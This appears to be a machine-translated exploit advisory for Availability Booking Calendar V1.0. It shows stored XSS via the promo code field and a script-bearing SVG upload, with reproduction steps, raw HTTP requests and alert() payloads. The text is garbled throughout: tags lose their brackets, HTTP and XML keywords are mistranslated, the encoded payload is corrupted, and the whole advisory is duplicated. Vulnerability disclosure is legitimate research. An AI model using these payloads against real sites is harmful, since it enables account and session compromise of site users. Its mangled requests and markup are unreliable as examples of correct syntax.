#利用标题:可用性预订日历V1.0-多个跨站点脚本(XSS)
#日期: 07/2023
#利用作者: Andrey Stoykov
#测试在: Ubuntu 20.04
#blog: http://mmsecureltd.blogspot.com
XSS#1:
复制步骤:
1。浏览预订
2。选择所有预订
3。编辑预订并选择促销代码
4。输入有效载荷test'ScriptAlert(
//HTTP邮政请求
post/availabilitybookingcalendarphp/index.php?controller=gzbookingAction=edit http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
[.]
edit_booking=1calendars_price=900extra_price=0tax=10deposit=91promo_code=91promo_code=test%22%22%3E%3CScript%3CScript%3EALERT%28%60xs%60%60%29%29%29%3C%3C%2fScript%3ediscount=0total=0total=0total=910Createe__booke_booking=1
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 205
[.]
//HTTP获取请求到预订页面
get/availabilitybookingcalendarphp/index.php?controller=gzbookingAction=editid=2 http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 33590
[.]
[.]
标签class='control-label'for='promo_code'promo code:/label
输入id='promo_code'class='form-control input-sm'type='text'name='promo_code'size='25'value=test'scriptalert(
/div
[.]
无限制的文件上传#1:
//SVG文件内容
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(XSS');
/脚本
/svg
复制步骤:
1。浏览我的帐户
2。图像浏览- 上传
3。然后右键单击图像
4。在新标签中选择“打开图像”
//HTTP邮政请求
post/availabilitybookingcalendarphp/index.php?controller=gzuseraction=editid=1 http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
[.]
------------------------------------------------------ 13831219578609189241212424546
content-disposition: form-data;名称='img';文件名='xss.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(XSS');
/脚本
/svg
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 190
[.]
#日期: 07/2023
#利用作者: Andrey Stoykov
#测试在: Ubuntu 20.04
#blog: http://mmsecureltd.blogspot.com
XSS#1:
复制步骤:
1。浏览预订
2。选择所有预订
3。编辑预订并选择促销代码
4。输入有效载荷test'ScriptAlert(
XSS)/脚本//HTTP邮政请求
post/availabilitybookingcalendarphp/index.php?controller=gzbookingAction=edit http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
[.]
edit_booking=1calendars_price=900extra_price=0tax=10deposit=91promo_code=91promo_code=test%22%22%3E%3CScript%3CScript%3EALERT%28%60xs%60%60%29%29%29%3C%3C%2fScript%3ediscount=0total=0total=0total=910Createe__booke_booking=1
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 205
[.]
//HTTP获取请求到预订页面
get/availabilitybookingcalendarphp/index.php?controller=gzbookingAction=editid=2 http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 33590
[.]
[.]
标签class='control-label'for='promo_code'promo code:/label
输入id='promo_code'class='form-control input-sm'type='text'name='promo_code'size='25'value=test'scriptalert(
xss)/script'title='促销代码'loteholder='''''''/div
[.]
无限制的文件上传#1:
//SVG文件内容
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(XSS');
/脚本
/svg
复制步骤:
1。浏览我的帐户
2。图像浏览- 上传
3。然后右键单击图像
4。在新标签中选择“打开图像”
//HTTP邮政请求
post/availabilitybookingcalendarphp/index.php?controller=gzuseraction=editid=1 http/1.1
HOST:主机名
用户-Agent: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
[.]
[.]
------------------------------------------------------ 13831219578609189241212424546
content-disposition: form-data;名称='img';文件名='xss.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(XSS');
/脚本
/svg
[.]
//HTTP响应
http/1.1 200好
content-type:文本/html; charset=UTF-8
内容长度: 190
[.]
